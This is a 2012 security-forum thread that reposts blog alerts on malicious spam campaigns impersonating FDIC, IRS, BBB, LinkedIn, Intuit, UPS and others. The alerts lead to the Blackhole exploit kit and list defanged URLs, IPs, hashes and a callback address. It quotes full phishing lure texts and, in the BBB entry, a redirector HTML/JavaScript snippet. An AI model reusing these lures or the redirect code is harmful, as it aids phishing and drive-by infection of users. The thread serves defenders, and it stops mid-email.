(More) Fake UPS e-mail messages ...
> http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=25171
Sep 19, 2012
:mad:
AplusWebMaster
2012-09-19, 23:28
FYI...
Fake FDIC emails serve client-side exploits and malware
- http://blog.webroot.com/2012/09/19/cybercriminals-impersonate-fdic-serve-client-side-exploits-and-malware/
Sep 19, 2012 - "... cybercriminals started spamvertising millions of emails impersonating the Federal Deposit Insurance Corporation (FDIC), in an attempt to trick businesses into installing a bogus and non-existent security tool promoted in the emails. Upon clicking on the links, users are exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised FDIC impersonating email:
> https://webrootblog.files.wordpress.com/2012/09/fdic_spam_email_malware_exploits_black_hole_exploit_kit.png
Once the user clicks on the malicious link, he’s exposed to the following bogus “Page loading…” page:
> https://webrootblog.files.wordpress.com/2012/09/fdic_spam_email_malware_exploits_black_hole_exploit_kit_01.png
Client-side exploits serving URL: hxxp ://afgreenwich .net/main.php?page=0f123fe645ddf8d7 - 203.91.113.6 (AS24559)...
Upon successful client-side exploitation, the campaign drops MD5: 3ce1ae2605aa800c205ef63a45ffdbfa *
... Trojan-Ransom.Win32.Gimemo.aovu; W32.Cridex
Once executed, it attempts to phone back to 72.167.253.106 :8080/mx/5/B/in (AS26496)...
More MD5s are known to have phoned back to the same IP in the past, for instance:
MD5: 97974153c25baf5826bf441a8ab187a6 **
...Trojan.Win32.Jorik.Zbot.fxq; Gen:Variant.Zusy.17989
... and MD5: 9069210d0758b34d8ef8679f712b48aa ***
... Trojan.Winlock.6049; W32/Cridex.R ..."
* https://www.virustotal.com/file/87742fa4d67a5d142e77dbeda2cc02bd2a975bf543ea0505045b096a82068c93/analysis/
File name: b9126f7be02c682d7b1b534c928881a0aba6ae0c
Detection ratio: 25/42
Analysis date: 2012-09-16
** https://www.virustotal.com/file/4b9a4956f8c4970f1029f814f4ad97b19bb051e186318795e482d20650fa325b/analysis/
File name: test73608696665548.bin
Detection ratio: 16/42
Analysis date: 2012-09-13
*** https://www.virustotal.com/file/c6c83420c4c2a64bd03463b6afd36b218aa6edb936c4ac15b9367669c354b59a/analysis/
File name: readme.exe
Detection ratio: 6/42
Analysis date: 2012-09-14
___
New Malware Sites using Blackhole Exploit Kit v2.0
- https://blog.opendns.com/2012/09/18/new-malware-sites-using-blackhole-exploit-kit-v2-0/
Sep 18, 2012
:mad: :mad:
AplusWebMaster
2012-09-23, 14:32
FYI...
LinkedIn SPAM / 69.194.201.21
- http://blog.dynamoo.com/2012/09/linkedin-spam-6919420121.html
22 Sep 2012 - "This fake LinkedIn spam leads to malware on 69.194.201.21:
Date: Sat, 22 Sep 2012 15:16:47 -0500
From: "Reminder" [CC8504C0E@updownstudio.com]
Subject: LinkedIn: New messages awaiting your response
LinkedIn
REMINDERS
Invitation reminders:
From Emilio Byrd (Insurance Manager at Wolseley)
PENDING MESSAGES
There are a total of 88 message(-s) awaiting your response. Go to InBox now.
This message was sent to [redacted]. This is an occasional email to help you get the most out of LinkedIn.
Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission.
2012, LinkedIn Corporation.
The malicious payload is at [donotclick]69.194.201.21 /links/deep_recover-result.php (Solar VPS, US) which appears to be a Blackhole 2 exploit kit. Blocking this IP address would be prudent."
___
Fake 'KLM e-Ticket' attempts to install backdoor
- http://community.websense.com/blogs/securitylabs/archive/2012/09/21/fake-klm-e-ticket-attempts-to-install-backdoor.aspx
21 Sep 2012 - "... malicious zipped attachment..."
___
New Malware Sites using Blackhole Exploit Kit v2.0
- https://blog.opendns.com/2012/09/18/new-malware-sites-using-blackhole-exploit-kit-v2-0/
Sep 18, 2012
:fear: :mad:
AplusWebMaster
2012-09-25, 00:17
FYI...
BBB malicious SPAM flood
- http://community.websense.com/blogs/securitylabs/archive/2012/09/24/bbb-malicious-spam-flood.aspx
24 Sep 2012 - "... another barrage of malicious BBB (Better Business Bureau) complaint notifications... Websense.. has detected and intercepted a marked increase in BBB malicious email this month... In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/3288.BBB_2D00_Image1.png
... a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs"...
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/3276.BBB_2D00_Image2.png_2D00_550x0.png
... As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn, the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit seem to be the main weapons used by cybercriminals in malicious spam nowadays. Redirection paths:
1) hxxp ://vargasvilcolombia .com/PykKDZe/index.html
2)<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
</html>
3) document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';
As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0..."
___
BBB Spam / 108.178.59.11
- http://blog.dynamoo.com/2012/09/bbb-spam-1081785911.html
24 Sep 2012 - "... most likely a Blackhole 2 kit. This IP address has been used in other attacks and should be blocked if you can."
- http://centralops.net/co/DomainDossier.aspx
108.178.59.11
network:State: Italy
OriginAS: AS32475
- http://google.com/safebrowsing/diagnostic?site=AS:32475
"... over the past 90 days, 2949 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-24, and the last time suspicious content was found was on 2012-09-24... we found 149 site(s)... that appeared to function as intermediaries for the infection of 375 other site(s)... We found 141 site(s)... that infected 838 other site(s)..."
:mad:
AplusWebMaster
2012-09-25, 20:09
FYI...
Twitter DMs from "friends" lead to backdoor Trojan
- http://nakedsecurity.sophos.com/2012/09/24/twitter-facebook-video-malware/
Sep 24, 2012 - "Have you received a Twitter message from an online friend, suggesting you have been captured in a Facebook video?... The aim of the messages? To trick the unwary into clicking on a link... and ultimately infect computers. Here is one example:
> https://sophosnews.files.wordpress.com/2012/09/twitter-hacked.jpg?w=640
... here's another. Note that there are many different combinations of wording that can be used.
> https://sophosnews.files.wordpress.com/2012/09/twitter-hacked-2.jpg?w=640
Users who click on the link are greeted with what appears to be a video player and a warning message that "An update to Youtube player is needed". The webpage continues to claim that it will install an update to Flash Player 10.1 onto your computer.
> https://sophosnews.files.wordpress.com/2012/09/video-malware.jpg?w=640
... In this example, the program you are being invited to download is called FlashPlayerV10.1.57.108.exe, and is detected by Sophos anti-virus products as Troj/Mdrop-EML, a backdoor Trojan that can also copy itself to accessible drives and network shares. Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of -not- automatically clicking on a link just because it appeared to be sent to you by a trusted friend. If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."
:mad:
AplusWebMaster
2012-09-25, 23:33
FYI...
Evil network: 108.178.59.0/26
- http://blog.dynamoo.com/2012/09/evil-network-10817859026.html
25 Sep 2012 - "There's quite a bit of malware coming from a range of Singlehop IPs over the past few days. The range is 108.178.59.0/26 (108.178.59.0 - 108.178.59.63)
So far, I've seen blackhole samples from 108.178.59.20, 108.178.59.11 and 108.178.59.26 which is enough to convince me that the whole /26 is bad and should be blocked.
Singlehop have reallocated the IP range to a customer:
network: IP-Network: 108.178.59.0/26
network: State: Italy
network: Country-Code: IT ...
It's quite possible that Mr Coco doesn't know that the IP range is being abused in this way, but blocking access to it would be prudent..."
- http://centralops.net/co/DomainDossier.aspx
network: IP-Network: 108.178.59.0/26
network: State:Italy
network: Country-Code: IT
___
BBB SPAM / one.1000houses .biz
- http://blog.dynamoo.com/2012/09/bbb-spam-one1000housesbiz.html
25 Sep 2012 - "This fake BBB spam leads to malware at one.1000houses .biz:
Date: Tue, 25 Sep 2012 11:42:18 +0200
From: "Better.Business Bureau" [8050910@zread.com]
Subject: Activity Report
Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.
You are asked to provide response to this complaint within 7 days.
Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.
Complaint ID#125368
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277
The malicious payload is at [donotclick]one.1000houses .biz/links/deep_recover-result.php hosted on 199.195.116.185 (A2 Hosting, US). The domain 1000houses .biz appears to be a legitimate domain where the GoDaddy account has been hacked to serve malware on subdomains. There seems to be a long-standing issue with GoDaddy domains being used in this way.
Blocking 199.195.116.185 would probably be prudent..."
:mad: :mad:
AplusWebMaster
2012-09-26, 14:29
FYI...
FTC halts computer spying
* http://www.ftc.gov/opa/2012/09/designware.shtm
09/25/2012
Rent-to-own laptops were spying on users
- http://h-online.com/-1717567
26 Sep 2012 - "The US Federal Trade Commission (FTC) has settled a case with several computer rent-to-own companies and a software maker over their use of a program which spied on as many as 420,000 users of the computers. The terms of the settlement* will ban the companies from using monitoring software, deceiving customers into giving up information or using geo-location to track users. "The FTC orders today will put an end to their cyber spying" said Jon Leobowitz, FTC Chairman. The software for rental companies from DesignerWare included a "Detective Mode", a spyware application that, according to the FTC's complaint, could activate the webcam of a laptop and take pictures and log keystrokes of user activity. The software also regularly presented a fake registration screen designed to trick users into entering personal information. The data from this application was then transmitted to DesignerWare where it was then passed on to the rent-to-own companies... The FTC is limited in its actions, telling Wired**, "We don't have criminal authority. We only have civil authority" and, as this was a first violation of the FTC act, it cannot impose fines on the companies. Instead, the companies will be monitored by the FTC for compliance with the ban on using the software, or, in the case of DesignerWare, licensing it, for the next 20 years..."
** http://www.wired.com/threatlevel/2012/09/laptop-rental-spyware-scandal/
:mad:
AplusWebMaster
2012-09-26, 15:55
FYI...
Spear Phishing Emails increase 56% ...
- http://blog.fireeye.com/research/2012/09/top-20-words-used-in-spear-phishing-emails.html
2012.09.25 - "Despite the many security defenses aimed at protecting email communications, email continues to be a critical vulnerability for enterprises. Between Q1 2012 and Q2 2012 alone, FireEye reported a 56% increase in the amount of malicious emails - and this wasn’t simply an increase in the total number of emails distributed; it was an increase in the number of emails that were able to -bypass- signature and reputation-based security defenses, like next-generation firewalls, intrusion prevention systems (IPS), anti-virus (AV), and secure gateways... In a new report from FireEye*, FireEye researchers analyze the nature of malicious files cybercriminals distribute in order to bypass traditional security defenses and identify several trends - including the most common words in file names and file extensions used in spear phishing attacks. Among these trends, in particular, FireEye researchers found:
• File names relating to shipping grew from 19.20% to 26.35%.
• Number of files referencing words associated with urgency grew from 1.72% to 10.68%.
• Shipping-related words topped the lists of most frequently appearing words in spear phishing emails for both 2H 2011 and 1H 2012.
In the security community, we’re more than familiar with the consequences stemming from these kinds of advanced cyber attacks - GhostNet, Night Dragon, Operation Aurora, and the RSA breach all originated, at least in part, via targeted spear phishing emails. These highly publicized incidents only further indicate what cybercriminals already well know and use to their advantage: email is a mode of attack that works..."
* http://www.fireeye.com/resources/pdfs/fireeye-top-spear-phishing-words.pdf
:mad:
AplusWebMaster
2012-09-26, 23:19
FYI...
IRS SPAM - 3 different versions ...
- http://blog.dynamoo.com/2012/09/irs-spam-1howtobecomeabostoniancom-and.html
26 Sep 2012 - "Three different versions of fake IRS spam today, two leading to malware on 1.howtobecomeabostonian .com and the other with a malicious payload on mortal-records .net.
Date: Wed, 26 Sep 2012 20:44:47 +0530
From: "Internal Revenue Service (IRS)" [58D1F47@guyzzer.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Hello,
Due to the system error the EIN of your company has been accidently erased from the online database, please validate your EIN to reaffirm your current status of taxpayer. Certain indulgences will be applied to the next audit report for your company. IRS is sorry to cause inconvenience.
For detail information, please refer to:
https ://www.irs .gov/Login.aspx?u=E8710D9E9
Email address: [redacted]
Sincerely yours,
Barry Griffin
IRS Customer Service representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) � Internal Revenue Service � 1111 Constitution Ave. N.W. � Washington DC 20535
==========
Date: Wed, 26 Sep 2012 11:09:45 -0400
From: "Internal Revenue Service (IRS)" [90A75BC@etherplay.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Dear business owners,
Due to the corrections in the taxation policies that have been recently applied, IRS informs that LLC, C-Corporations and S-Corporations have to validate their EIN in order to reaffirm their actual status. You have 14-day period in order to examine all the changes and make necessary amendments. We are sorry for the inconvenience caused.
For the details please refer to:
https ://www.irs .gov/ClientArea.aspx?u=1CBD0FC829256C
Email address: [redacted]
Sincerely yours,
Damon Abbott
Internal Revenue Service Representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) � Internal Revenue Service � 1111 Constitution Ave. N.W. � Washington DC 20535
==========
Date: Wed, 26 Sep 2012 19:53:28 +0400
From: Internal Revenue Service [weirdpr6@polysto.com]
To: [[redacted]]
Subject: IRS report of not approved tax bank transfer
Your Federal Tax pending transaction (ID: 52007291963155), recently ordered for processing from your checking account was rejected by your Bank.
Rejected Tax transaction
Tax Transaction ID: 52007291963155
Reason ID See details in the report below
State Tax Transaction Report tax_report_52007291963155.doc (Microsoft Word Document)
Internal Revenue Service 9611 Tellus. Av. Augusta 38209 MV
Payload one is at [donotclick]1.howtobecomeabostonian .com/links/marked-alter.php hosted on 74.207.232.13 (Linode, US) which looks like a -hacked- GoDaddy domain. Payload two is at [donotclick]mortal-records .net/detects/processing-successfully.php hosted on 203.91.113.6 (G-Mobile, Mongolia) which is an IP address that has been used a LOT for this type of attack. Blocking those IPs would be ideal..."
:mad:
AplusWebMaster
2012-09-27, 16:14
FYI...
Fake iPhone sales emails/sites ...
- http://blog.webroot.com/2012/09/27/from-russia-with-iphone-selling-affiliate-networks/
Sep 27, 2012 - "... cybercriminals continue introducing new services and goods with questionable quality and sometimes unknown origins on the market, with the idea to entice potential network participants into monetizing the traffic they can deliver through black hat SEO (Search Engine Optimization), malvertising, and spam campaigns... a recently launched affiliate network selling iPhones that primarily targets Russian-speaking customers, and emphasizes the traffic acquisition scheme used by one of the network’s participants... It all starts with a spam campaign offering brand new iPhones for a decent price in an attempt by one of the network participants to acquire traffic which will ultimately convert into sales.
Sample spamvertised email offering cheap and easy-to-obtain iPhones"
> https://webrootblog.files.wordpress.com/2012/09/spam_iphone_russian_affiliate_network.png
... an example of an affiliate network participant targeting English-speaking users, even though the actual web site is targeting Russian-speaking users...
Sample screenshot of the entry page for the iPhone selling affiliate network:
> https://webrootblog.files.wordpress.com/2012/09/iphone_sale_affiliate_network.png
(More samples available at the blog.webroot URL above)...
We advise bargain hunters to avoid clicking on links found in spam emails, avoid entering their credit card details on sites found in spam emails, and to avoid purchasing -any- kind of item promoted in these emails."
:mad:
AplusWebMaster
2012-10-02, 00:55
FYI... multiple entries:
Intuit SPAM - Shipment / art-london .net
- http://blog.dynamoo.com/2012/10/intuit-shipment-spam-art-londonnet.html
1 Oct 2012 - "This terminally confused Intuit / USPS / Amazon-style spam leads to malware...
Date: Mon, 1 Oct 2012 21:31:57 +0430
From: "Intuit Customer Service" [battingiy760@clickz.com]
To: [redacted]
Subject: Intuit Shipment Confirmation
Dear [redacted],
Great News! Your order, ID859560, was shipped today (see info below) and will complete shortly. We hope that you will find that it exceeds your expectations. If you ordered not one products, we may send them in separate boxes (at no additional cost to you) to ensure the fastest possible delivery. We will also provide you with the ability to track your shipments via the information below.
Thank you for your interest.
ORDER DETAILS
Order #: ID859560
Order Date: Sep 25, 2012
Item(s) In Your Order
Shipping Date: October, 1 2012
Shipping Method: USPS Express Mail
Estimated Delivery Date: October, 3 2012 - October 05, 2012
Tracking No.: 5182072894288348304217
Quantity Item
1 Intuit Card Reader Device - Gray
Please be informed that shipping status details may be not available yet online. Check the Website Status link above for details update.
Shipment Information:
We sent your item(s) to the next address:
065 S Paolo Ave, App. 5A
S Maria, FL
Email: [redacted]
Questions about your order? Please visit Customer Service.
Return Policy and Instructions
Privacy | Legal Disclaimer | Contact Us | About
You have received this business note as part of our efforts to fulfill your request and service your account. You may receive more email notifications from us even if you have previously selected out of marketing notifications...
The malicious payload is at [donotclick]art-london .net/detects/stones-instruction_think.php hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden), a site which also hosts the presumably malicious domain indice-acores .net. Presumably this IP is a hacked server belonging to some legitimate Swedish organisation, but you should block it nonetheless."
___
Fake Intuit order confirmation
- http://security.intuit.com/alert.php?a=59
10/01/2012 - "... receiving emails with the title "Your Intuit Order Notification."
Below is a copy of the email people are receiving:
> http://security.intuit.com/images/yourintuitorder.jpg
... This is the end of the fake email. Steps to Take Now: Do not click on the link in the email... Delete the email..." etc...
___
Sendspace SPAM / onlinebayunator .ru
- http://blog.dynamoo.com/2012/10/sendspace-spam-onlinebayunatorru.html
1 Oct 2012 - "I haven't seen Sendspace spam before.. but here it is, leading to malware on onlinebayunator .ru:
Date: Mon, 1 Oct 2012 10:40:29 +0300
From: Twitter
To: [redacted]
Subject: You have been sent a file (Filename: [redacted]-9038870.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-56.pdf, (133.8 KB) waiting to be downloaded at sendspace.(It was sent by CHIQUITA Caldwell).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service...
The malicious payload is at [donotclick]onlinebayunator .ru:8080/forum/links/column.php hosted on the same IP address ( 84.22.96.0/19 ) as this attack* earlier today.
* http://blog.dynamoo.com/2012/10/nacha-spam-onlinebayunatorru.html
___
Evolution1 SPAM / 69.194.194.221
- http://blog.dynamoo.com/2012/10/evolution1-spam-69194194221.html
1 Oct 2012 - "I haven't seen this spam before, it leads to malware on 69.194.194.221:
Date: Mon, 01 Oct 2012 15:44:59 +0200
From: "INTUIT" [D6531193@familyhealthplans.com]
Subject: Information regarding Employer Contribution
INTUIT
Attn: Account Holder
You can view the information about all Employer contributions that are due to be made on 2/1/2012 by visiting the following link:
http ://intuithealthemployer .lh1ondemand .com
Please let us know employment alterations on your enrollment spreadsheet within the period of two business days. The foregoing report shows the ACH amount we will withdraw from your bank account for the contributions on the first business day of the month. Please remember, if changes occur, this may affect the ACH amount.
Intuit Health Debit Card Powered by Evolution1 Employer Services..."
The malicious payload is on 69.194.194.221 (Solar VPS, US) ..."
___
NACHA SPAM / onlinebayunator .ru
- http://blog.dynamoo.com/2012/10/nacha-spam-onlinebayunatorru.html
1 Oct 2012 - "This fake NACHA spam leads to malware on onlinebayunator.ru:
Date: Mon, 1 Oct 2012 04:16:46 -0500
From: Bebo Service [service@noreply.bebo.com]
Subject: Fwd: ACH Transfer rejected
The ACH debit transfer, initiated from your bank account, was canceled.
Canceled transaction:
Transfer ID: FE-764029897226US
Transaction Report: View
Valentino Dickey
NACHA - The Electronic Payment Association
f0c34915-3e624bbb...
The malicious payload is at [donotclick]onlinebayunator .ru:8080/forum/links/column.php (probably a Blackhole 2 exploit kit) hosted on the following familiar IPs that should be blocked:
84.22.100.108 (Republic CyberBunker, Antarctica - Amsterdam more likely)
190.10.14.196 (RACSA, Costa Rica)
203.80.16.81 (Myren, Malaysia)
Of note, CyberBunker has a long history of spamming and tolerating criminals. Blocking the range 84.22.96.0/19 should afford your network some additional protection."
:mad: :mad: :mad:
AplusWebMaster
2012-10-03, 00:08
FYI... multiple entries:
Fake ecard - unsolicited secret admirers via Email
- http://community.websense.com/blogs/securitylabs/archive/2012/10/02/unsolicited-secret-admirers-via-email.aspx
02 Oct 2012 - "... an unsolicited email campaign in which love-struck or curious recipients may have their appetites whetted by the thought of a secret admirer... The messages, sent from various Yahoo .com accounts, suggest that the sender has "to let you know how [they] feel" and provide an enticing Facebook link to "View Your Ecard":
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/7776.emailbody.png_2D00_550x0.png
... a valid short Facebook URL is used which, in this case, -redirects- ... a basic JavaScript is delivered... The victim's browser is then directed to a fake ecard site hxxp ://readyourecard .com/viewmessage/?a=vip36
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/6303.ecard.png_2D00_550x0.png
... At this point, the aim of the campaign becomes clear: Every link on the fake ecard page redirects to an affiliate landing page on the Adult Dating website AdultFriendFinder .com and, with affiliate earnings of up to $1 per unique visitor, you can easily see how such a campaign could become very lucrative... This campaign appears to be financially driven, but it is conceivable that the same techniques could be used to direct victims to malicious sites..."
___
Fake Fax Email notifications ...
- http://www.gfi.com/blog/beware-fake-fax-email-notifications-in-circulation/
Oct 2, 2012 - "In the last few days we’ve seen this fake fax email doing the rounds, offering up a “2013 recruitment plan”:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/faxmalware1.jpg
... INCOMING FAX REPORT
*********************************************************
Date/Time: 09/28/2012 07:01:41 AM
Speed: 14400 bps
Connection time: 01:02
Pages: 2
Resolution: Normal
Remote ID: 0420950504
Line number: 2
DTMF/DID:
Description: 2013 Recruitment plan
Click here to view the file online ..."
... Clicking the link would take the user from a (dot)de domain to an IP associated with a Malware run currently taking place... currently leads to a "page not found":
> http://www.gfi.com/blog/wp-content/uploads/2012/10/faxnotfound.jpg
... varied subject lines in this particular spam campaign – everything from recruitment plans to employment contributions and transaction reports – indicate a definite lean towards business targets rather than home users. Of course, whether at home or in the workplace you’re still potentially at risk should you click any of the links going out in this spamrun..."
:mad:
AplusWebMaster
2012-10-03, 14:36
FYI...
Fake Quickbooks emails lead to malware
- http://www.gfi.com/blog/fake-quickbooks-emails-lead-to-malware-shenanigans/?
Oct 3, 2012 - "We have some more rogue emails following the familiar pattern of the last few days – this time around, a fake Quickbooks themed email which promises “free shipping for Quickbooks customers”:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/quickbooksspam.jpg
It points to a website that shows the end-user a “connecting to server” message, eventually redirecting to an IP address that has been / is still associated with Blackhole Exploit Kit and Java exploits.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/quickbooksspam2.jpg
... it’s a bad time to be randomly opening dubious emails..."
Fake QB/IRS order forms emails
- http://security.intuit.com/alert.php?a=62
10/03/2012
> http://security.intuit.com/images/phish63.jpg
___
Something evil on 66.45.251.224/29 and 199.71.233.226
- http://blog.dynamoo.com/2012/10/something-evil-on-664525122429-and.html
3 Oct 2012 - "The IP address 199.71.233.226 (Netrouting, US) and the range 66.45.251.224/29 (Interserver, US) are currently being used to distribute malware through advertising. Of these the 66.45.251.224/29 has been suballocated to an anonymous person, which I didn't even know was permitted... The domains listed below are on those IP addresses, all appear to be disributing malware (see example*) and they seem to have fake or anonymous WHOIS details. Blocking traffic to 66.45.251.224/29 (66.45.251.224 - 66.45.251.231) and 199.71.233.226 should be effective in countering this threat..."
Update: 95.211.193.36 (Leaseweb, Netherlands) and 77.95.230.77 (Snel Internet Services, Netherlands) may also be distributing malware in connection with this (report here**).
(More info at the blog.dynamoo URL above.)
* http://www.google.com/safebrowsing/diagnostic?site=juniorppv.info
"Site is listed as suspicious... Malicious software includes 8 trojan(s)..."
** http://wepawet.iseclab.org/view.php?hash=d5821ee7ba6fd7c95f6bf07137aee3b9&t=1349259972&type=js
___
Friendster SPAM / sonatanamore .ru
- http://blog.dynamoo.com/2012/10/friendster-spam-sonatanamoreru.html
2 Oct 2012 - "Friendster.. remember that? Before Facebook.. before Myspace.. there was Friendster. This spam email is -not- from Friendster though and leads to malware on sonatanamore .ru:
Date: Tue, 2 Oct 2012 05:39:54 -0500
From: Friendster Games [friendstergames@friendster.com]
Thank you for joining Friendster! Your system generated password is 0JR8YXB1YR. You may change your password in your Account Settings Page.
Friendster is the social gaming destination of choice. Connect and play with your friends & share your progress with your network.
Copyright ? 2002 - 2012 Friendster, Inc. All rights reserved. Visit our site. - Terms of Service
To manage your notification preferences, go here
To stop receiving emails from us, you can unsubscribe here
The malicious payload is at [donotclick]sonatanamore .ru:8080/forum/links/column.php hosted on:
70.38.31.71 (iWeb, Canada)
202.3.245.13 (MANA, Tahiti)
203.80.16.81 (Myren, Malaysia)
Plain list of IPs and domains on those IPs for copy-and-pasting.
70.38.31.71, 202.3.245.13, 203.80.16.81 ..."
(More listed at the blog.dynamoo URL above.)
:mad:
AplusWebMaster
2012-10-05, 01:43
FYI...
Fake "Corporate eFax message" SPAM / 184.164.136.147
- http://blog.dynamoo.com/2012/10/corporate-efax-message-spam-184164136147.html
4 Oct 2012 - "These fake fax messages lead to malware on 184.164.136.147:
Date: Thu, 04 Oct 2012 19:00:16 +0200
From: "eFax.Alert" [E988D6C @vida .org.pt]
Subject: Corporate eFax message - 09 pages
Fax Message [Caller-ID: 341-498-5688]
You have received a 09 pages fax at Thu, 04 Oct 2012 19:00:16 +0200.
* The reference number for this fax is min1_20121004190016.8673161.
View this fax using your PDF reader.
Click here to view this message
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service!
Home | Contact | Login
� 2011 j2 Global Communications, Inc. All rights reserved.
eFax� is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax� Customer Agreement.
... The malicious payload is at [donotclick]184.164.136.147/links/assure_numb_engineers.php which is an IP address belonging to Secured Servers LLC in the US and suballocated to:
autharea=184.164.128.0/19
xautharea=184.164.128.0/19
network:City:Manilla ...
It might be worth blocking 184.164.136.128/27 to be on the safe side."
- http://www.google.com/safebrowsing/diagnostic?site=AS:20454
"... over the past 90 days, 244 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... the last time suspicious content was found was on 2012-10-04..."
- http://www.google.com/safebrowsing/diagnostic?site=AS:32164
"... the last time suspicious content was found was on 2012-10-03... we found 1 site(s) on this network... that appeared to function as intermediaries for the infection of 14 other site(s)..."
___
Verizon Wireless SPAM / strangernaturallanguage .net
- http://blog.dynamoo.com/2012/10/verizon-wireless-spam.html
4 Oct 2012 - "This fake Verizon wireless spam leads to malware on strangernaturallanguage .net:
From: AccountNotify whitheringj @spcollege .edu
Date: 4 October 2012 18:52
Subject: Recent Notification in My Verizon
SIGNIFICANT ACCOUNT NOTIFICATION FROM VERIZON WIRELESS.
Your informational letter is available.
Your account # ending: XXX8 XXXX4
Our Valued Client
For your accommodation, your confirmation message can be found in the Account Documentation desk of My Verizon.
Please check your acknowledgment letter for all the information relating to your new transaction.
View Approval Message
In addition, in My Verizon you will find links to info about your device & services that may be helpfull if you looking for answers.
Thank you for joining us .
My Verizon is also accessible 24 hours 7 days a week to assist you with:
Usage details
Updating your tariff
Add Account Users
Pay your invoice
And much, much more...
© 2012 Verizon Wireless
Verizon Wireless | One Verizon Way | Mail Code: 523WSE | Basking Ridge, MA 55584
We respect your privacy. Please review our privacy policy for more details
The malicious payload is at [donotclick]strangernaturallanguage .net/detects/notification-status_login.php hosted on 183.81.133.121 (Vodafone, Fiji)..."
:buried:
AplusWebMaster
2012-10-05, 21:25
FYI...
Intuit "GoPayment" SPAM / simplerkwiks .net
- http://blog.dynamoo.com/2012/10/intuit-gopayment-spam-simplerkwiksnet.html
5 Oct 2012 - "This fake "Intuit GoPayment" spam leads to malware on simplerkwiks .net:
Date: Fri, 5 Oct 2012 15:54:26 +0100
From: "Intuit GoPayment" [abstractestknos65@pacunion.com]
Subject: Welcome - you're been granted access for Intuit GoPayment Merchant
Greetings & Congrats!
Your GoPayment? statement for WALLET , DEVELOPMENTS has been issued.
Intuit Payment
Account No.: XXXXXXXXXXXXXX16
Email Address: [redacted]
NOTE : Additional charges for this service may now apply.
Next step: Confirm your User ID
This is Very Important lets you:
Manage your payment service in the Merchant Center
Review charges
Log In to other Intuit products you may use, like TurboTax, Quicken, and Intuit Payroll
The good news is you have active an existing Intuit account for your email address, You can use this ID for your payment service also, or enter a new one.
Verify UserID
Get started:
Step 1: If you have not still, download the Intuit application.
Step 2: Run the GoPayment app and sign in with the UserID (your email address) and Password you setup.
Easy Manage Your GoPayment System
The Intuit GoPayment Merchant Service Center is the website where you can learn a lot about GoPayment features, customize your sales receipt and add GoPayment users. You can also manage transactions, deposits and fees. Visit link and signin with your GoPayment Access ID (your email address) and Password.
For more information on how to get started using Intuit Merchant, including tutorials, FAQs and other resources, visit the Service Center at web site.
Please do not reply to this message. automative notification system not configured to accept incoming email.
System Terms & Agreements � 2012 Intuit, Inc. All rights reserved.
The malicious payload is at [donotclick]simplerkwiks .net/detects/congrats_verify-access.php hosted on 183.81.133.121 (Vodafone, Fiji) along with these other suspect domains:
addsmozy .net
officerscouldexecute .org
simplerkwiks .net
strangernaturallanguage .net
buzziskin .net
art-london .net "
___
UPS SPAM / minus.preciseenginewarehouse .com
- http://blog.dynamoo.com/2012/10/ups-spam-minuspreciseenginewarehousecom.html
5 Oct 2012 - "This fake UPS spam leads to malware on minus.preciseenginewarehouse .com:
From: "UPSBillingCenter" [512A03797@songburi.com]
Subject: Your UPS Invoice is Ready
This is an automatically generated email. Please do not reply to this email address.
Dear UPS Customer,
